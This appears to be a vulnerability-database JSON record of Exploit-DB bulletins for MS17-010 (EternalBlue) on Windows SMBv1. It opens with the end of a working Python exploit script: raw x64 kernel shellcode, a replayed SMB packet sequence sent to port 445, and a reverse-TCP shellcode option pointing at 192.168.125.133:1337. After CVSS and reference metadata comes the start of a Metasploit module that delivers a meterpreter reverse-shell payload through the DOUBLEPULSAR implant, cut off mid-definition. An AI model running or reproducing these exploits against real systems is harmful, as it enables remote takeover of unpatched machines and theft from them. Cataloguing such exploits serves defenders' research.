H\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA$H\\\\x01\\\\xf0^\\\\xc3H\\\\xd1\\\\xe1H\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3H\\\\x81\\\\xca\\\\x00\\\\x00\\\\xff\\\\xffH\\\\x81\\\\xf2\\\\x00\\\\x00\\\\xff\\\\xffH\\\\xc1\\\\xe2\\\\x02H\\\\x01\\\\xd1H1\\\\xd2\\\\x8b\\\\x11H\\\\x01\\\\xd0\\\\xc3WVSUATAUAVAWI\\\\x89\\\\xe4H\\\\x81\\\\xec\\\\x08\\\\x01\\\\x00\\\\x00I\\\\x89\\\\xcfH\\\\x8d-\\\\xe0\\\\xff\\\\xff\\\\xfff\\\\x81\\\\xe5\\\\x00\\\\xf0H\\\\x89MXH1\\\\xd2f\\\\x8bQ\\\\x02H\\\\x01\\\\xcaH;\\\\x11t\\\\x06H\\\\x8dI\\\\x08\\\\xeb\\\\xf5H\\\\x8dA(H\\\\x89E4H\\\\x8bA\\\\xf0H\\\\x89E(\\\\xe8(\\\\x01\\\\x00\\\\x00\\\\xe8{\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xed\\\\x00\\\\x00\\\\x00L\\\\x8bm<A\\\\x8bM\\\\xbc\\\\xe8\\\\xf9\\\\x00\\\\x00\\\\x00<#t\\\\r<wt\\\\x1d<\\\\xc8t#\\\\xe9\\\\xbd\\\\x00\\\\x00\\\\x00H\\\\x8bM(\\\\x8bED\\\\x89A\\\\x0e\\\\xb0\\\\x01\\\\x88A\\\\x12\\\\xe9\\\\xa5\\\\x00\\\\x00\\\\x00\\\\xe8\\\\xf4\\\\x00\\\\x00\\\\x00\\\\xe9\\\\x9b\\\\x00\\\\x00\\\\x00H1\\\\xdbH1\\\\xf6H1\\\\xffI\\\\x8bE\\\\xd8\\\\x8b\\\\x18\\\\x8bp\\\\x04\\\\x8bx\\\\x08\\\\x8bMH1\\\\xcb1\\\\xce1\\\\xcfA;u\\\\x10u{;]TH\\\\x8bELt\\\\x16\\\\xe8\\\\xd1\\\\x00\\\\x00\\\\x00H\\\\x8dS\\\\x04H1\\\\xc9\\\\xffU\\\\x10H\\\\x89EL\\\\x89]TH\\\\x85\\\\xc0t[H\\\\x01\\\\xf7H9\\\\xdfwOH)\\\\xf7H\\\\x01\\\\xc7WH\\\\x89\\\\xf1QI\\\\x8bu\\\\xe8\\\\xf3\\\\xa4YH\\\\xc1\\\\xe9\\\\x02^\\\\x8bUH1\\\\x16H\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf8H\\\\x01\\\\xd8H9\\\\xc6|!\\\\xffUL\\\\xe8\\\\x81\\\\x00\\\\x00\\\\x00\\\\x8bED\\\\xd1\\\\xe8H1\\\\xc9\\\\x88\\\\xc1H\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89ED\\\\xe8C\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00H\\\\x8bM(\\\\xb4\\\\x00f\\\\x01A\\\\x1eH\\\\x8bE 
L\\\\x89\\\\xf9L\\\\x89\\\\xe4A_A^A]A\\\\\\\\][^_\\\\xff`x1\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bED\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89EHY\\\\xc3Q\\\\xe8\\\\x0e\\\\x00\\\\x00\\\\x00H\\\\x8bE H\\\\x8bHxH\\\\x89HpY\\\\xc3SWH\\\\x83\\\\xec(H\\\\x8b]LH\\\\x85\\\\xdbt\\\\x131\\\\xc0H\\\\x89\\\\xdfH1\\\\xc9\\\\x8bMT\\\\xf3\\\\xaaH\\\\x89\\\\xd9\\\\xffU\\\\x18H1\\\\xc0\\\\x89ETH\\\\x89ELH\\\\x83\\\\xc4(_[\\\\xc3QVWH\\\\x8bu4H\\\\x8b\\\\x0e\\\\xe8H\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0u\\\\x11H\\\\x8dv\\\\x08H\\\\x8b\\\\x0e\\\\xe87\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0t+H\\\\x89M4j\\\\x0cXH\\\\x8d\\\\xb1\\\\x90\\\\x00\\\\x00\\\\x00;\\\\x06t\\\\x08H\\\\x83\\\\xc6\\\\x08;\\\\x06u\\\\x11;F\\\\x04u\\\\x0cH\\\\x89u<H1\\\\xc0H\\\\xff\\\\xc0\\\\xeb\\\\x03H1\\\\xc0_^Y\\\\xc3H1\\\\xc0H9\\\\xc1}\\\\x03H\\\\xff\\\\xc0\\\\xc3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('close', 3, 9.967667061999236)\", \"('close', 4, 0.0)\", \"('close', 5, 0.0)\", \"('close', 6, 0.0)\", \"('close', 7, 0.0)\", \"('close', 8, 0.0)\", \"('close', 9, 0.0)\", \"('close', 10, 0.0)\", \"('close', 11, 0.0)\", \"('close', 12, 0.0)\", \"('close', 13, 0.0)\", \"('close', 14, 0.0)\", \"('close', 15, 0.0)\", \"('close', 17, 0.0)\", \"('send', 1, b'\\\\x00\\\\x00\\\\x00#\\\\xffSMBq\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00__TREEID__PLACEHOLDER__\\\\xff\\\\xfe__USERID__PLACEHOLDER__@\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('close', 18, 0.0)\", \"('close', 19, 0.0)\", \"('close', 20, 0.0)\", \"('close', 21, 0.0)\", \"('recv', 1, 0.0)\", '(\\'send\\', 1, 
b\"\\\\x00\\\\x00\\\\x00\\'\\\\xffSMBt\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00__TREEID__PLACEHOLDER__\\\\xff\\\\xfe__USERID__PLACEHOLDER__@\\\\x00\\\\x02\\\\xff\\\\x00\\'\\\\x00\\\\x00\\\\x00\", 0.0)', \"('recv', 1, 0.0)\", \"('close', 1, 0.0)\"]\r\n datfile = [ast.literal_eval(i) for i in datfile]\r\n orig_shellcode = binascii.unhexlify(b'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')\r\n\r\n # ASM Multi-Arch Kernel Ring 0 Shellcode by ZeroSum0x0: https://github.com/RiskSense-Ops/MS17-010/blob/master/payloads/x64/src/exploit/kernel.asm\r\n # Modification to this shellcode:\r\n # Code has been modified to call \"KeUnstackDetachProcess\" properly. The KeUnstackDetachProcess routine detaches the current thread from the address space of a process and restores the previous attach state. \r\n # Every successful call to KeStackAttachProcess must be matched by a subsequent call to KeUnstackDetachProcess. 
\r\n kernel_shellcode = binascii.unhexlify(b'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') \r\n\r\n # Shellcode TCP Bind port: 1337 size 484 bytes\r\n bindtcp_shellcode = binascii.unhexlify(b'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')\r\n\r\n # Shellcode TCP Reverse to 192.168.125.133 1337 \r\n reversetcp_shellcode = binascii.unhexlify(b'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')\r\n\r\n shellcode = reversetcp_shellcode\r\n new_shellcode = kernel_shellcode + int(len(shellcode)).to_bytes(2,'little') + shellcode\r\n to_replace = orig_shellcode[:len(new_shellcode)]\r\n new_datfile = []\r\n for i in datfile:\r\n if i[0] != 'send':\r\n new_datfile.append(i)\r\n continue\r\n j = list(i)\r\n j[2] = j[2].replace(to_replace,new_shellcode)\r\n new_datfile.append(tuple(j))\r\n open(\"smb.dat\",\"w\").write(\"\\n\\n\".join([repr(i) for i in new_datfile]))\r\n\r\ndef main(hostip):\r\n # Modify original .dat file and add/replace Kernel Shellcode by Zerosum0x0 + User Shellcode\r\n mod_replay()\r\n # Read dat file and send it over\r\n dattosend = open(\"smb.dat\").read().split(\"\\n\\n\")\r\n dattosend = [ast.literal_eval(i) for i in dattosend]\r\n connections = []\r\n userid = b'\\x00\\x08'\r\n treeid = b'\\x00\\x08'\r\n start = time.monotonic()\r\n for i in dattosend:\r\n delta = i[-1] - (start - time.monotonic())\r\n if delta > 0:\r\n time.sleep(delta)\r\n start = time.monotonic()\r\n if i[0] == \"connect\":\r\n sock = socket.socket()\r\n sock.connect((hostip,445))\r\n connections.append({\"socket\":sock,\"stream\" : i[1]})\r\n if i[0] == \"close\":\r\n [j['socket'].close() for j in connections if j[\"stream\"] == i[1]]\r\n if i[0] == \"send\":\r\n data = i[2].replace(b\"__USERID__PLACEHOLDER__\", userid)\r\n data = data.replace(b\"__TREEID__PLACEHOLDER__\", treeid)\r\n [j['socket'].send(data) for j in connections if j[\"stream\"] == i[1]]\r\n if i[0] == \"recv\":\r\n data = [j['socket'].recv(2048) for j in connections if j['stream'] == 
i[1]]\r\n if len(i) > 3:\r\n if i[2] == \"treeid\":\r\n treeid = data[0][28:30]\r\n if i[2] == \"userid\":\r\n userid = data[0][32:34]\r\n os.remove(\"smb.dat\")\r\n print(\"[*] Thanks NSA!\")\r\n print(\"[*] Creditz: @EquationGroup @ShadowBrokers @progmboy @zerosum0x0 @juansacco\")\r\n print(\"[*] KPN Red team: <juan.sacco@kpn.com>\")\r\n\r\nif __name__ == \"__main__\":\r\n print(\"[*] MS17-010 Exploit - SMBv1 SrvOs2FeaToNt OOB\")\r\n print(\"[*] Exploit running.. Please wait\")\r\n main(sys.argv[1])", "osvdbidlist": [], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"], "immutableFields": [], "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "edition": 2, "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "142f691ada068c40ae71fdd0eac8502e"}, {"key": "cvss", "hash": "2076413bdcb42307d016f5286cbae795"}, {"key": "cvss2", "hash": "e8dbb4c019811b96da3443b871bd4b26"}, {"key": "cvss3", "hash": "732a831a7eed3955e8de18b2d8903bc8"}, {"key": "description", "hash": 
"b3707319e60a5d53f83b97b7e5aa9cf4"}, {"key": "href", "hash": "d8276e96bec8d461c00437030f01a299"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "251f7e82e99b45e17b6cf8e939e6b119"}, {"key": "published", "hash": "251f7e82e99b45e17b6cf8e939e6b119"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "e53848d9c7e659c4bd32f7af7ff99515"}, {"key": "title", "hash": "60c4e0e78ee956e23a4933b5570e4af7"}, {"key": "type", "hash": "916b5dbd201b469998d9b4a4c8bc4e08"}], "scheme": null}, {"id": "EDB-ID:47456", "hash": "f4e267a2eb83e3d5a333c8f73ae8e22fd14be2bad91eefc01255b78e6ef9f7dc", "type": "exploitdb", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization (Metasploit)", "description": "", "published": "2019-10-02T00:00:00", "modified": "2019-10-02T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "https://www.exploit-db.com/exploits/47456", "reporter": "Exploit-DB", "references": [], "cvelist": ["CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0145", "CVE-2017-0144", "CVE-2017-0143"], "lastseen": "2019-10-02T15:29:45", "history": [{"bulletin": {"bulletinFamily": "exploit", "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {}, "description": "", "edition": 1, "enchantments": {"dependencies": {"modified": "2019-10-02T15:29:45", "references": [{"idList": ["KITPLOIT:9146046356497464176"], "type": "kitploit"}, {"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"], "type": "qualysblog"}, {"idList": ["KLA10977"], "type": "kaspersky"}, {"idList": ["KB4013389", "KB4012598"], "type": "mskb"}, {"idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"], "type": "attackerkb"}, 
{"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142602", "PACKETSTORM:142548", "PACKETSTORM:142603", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"], "type": "trendmicroblog"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"], "type": "saint"}, {"idList": ["SMNTC-96705", "SMNTC-96709", "SMNTC-96707", "SMNTC-96706", "SMNTC-96704", "SMNTC-96703"], "type": "symantec"}, {"idList": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "type": "cve"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2"], "type": "thn"}, {"idList": ["SSV:92952", "SSV:92964"], "type": "seebug"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", 
"THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["1337DAY-ID-27802", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0145", "MS:CVE-2017-0144", "MS:CVE-2017-0143"], "type": "mscve"}, {"idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"], "type": "mmpc"}, {"idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34", "MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"], "type": "malwarebytes"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"], "type": "openvas"}, {"idList": ["EDB-ID:41987", "EDB-ID:42030", "EDB-ID:41891", "EDB-ID:42031", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/"], "type": "metasploit"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "score": {"modified": "2019-10-02T15:29:45", "rev": 2, "value": 7.9, "vector": "NONE"}}, "hash": "c8cebb2b52918b5c630433f18c5a950e78ee27864d20c3321bb1f2713cf51417", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, 
{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "8437845d202b2ebef5be3251e688af41", "key": "href"}, {"hash": "916b5dbd201b469998d9b4a4c8bc4e08", "key": "type"}, {"hash": "d726e774add6189e33cf2ea0c61a2ba5", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "description"}, {"hash": "0bafb6325bcaf483a25404f785191cc5", "key": "modified"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss2"}, {"hash": "142f691ada068c40ae71fdd0eac8502e", "key": "cvelist"}, {"hash": "e53848d9c7e659c4bd32f7af7ff99515", "key": "reporter"}, {"hash": "0bafb6325bcaf483a25404f785191cc5", "key": "published"}, {"hash": "e1c3e280f0f2e9b13489f95ca8e6aeea", "key": "title"}], "history": [], "href": "https://www.exploit-db.com/exploits/47456", "id": "EDB-ID:47456", "immutableFields": [], "lastseen": "2019-10-02T15:29:45", "modified": "2019-10-02T00:00:00", "objectVersion": "1.5", "published": "2019-10-02T00:00:00", "references": [], "reporter": "Exploit-DB", "title": "DOUBLEPULSAR - Payload Execution and Neutralization (Metasploit)", "type": "exploitdb", "viewCount": 955}, "different_elements": ["cvss3", "cvss2"], "edition": 1, "lastseen": "2019-10-02T15:29:45"}], "viewCount": 1042, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:146236", "PACKETSTORM:142548"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-27786"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "700099.PRM", "700059.PRM", "MS17-010.NASL"]}, {"type": "kaspersky", "idList": 
["KLA10977"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:43970", "EDB-ID:41891"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0144", "CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96704", "SMNTC-96703", "SMNTC-96706", "SMNTC-96707", "SMNTC-96705", "SMNTC-96709"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0205", "CPAI-2017-0203", "CPAI-2017-0177", "CPAI-2017-0419", "CPAI-2017-0200", "CPAI-2017-0198"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", 
"TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0145", "MS:CVE-2017-0148"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2019-10-02T15:29:45", "rev": 2}, "score": {"value": 7.9, "vector": "NONE", "modified": "2019-10-02T15:29:45", "rev": 2}}, "objectVersion": "1.5", "sourceHref": "https://www.exploit-db.com/download/47456", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n 
Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload', {}],\r\n ['Neutralize implant', {}]\r\n ],\r\n 
'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n },\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def 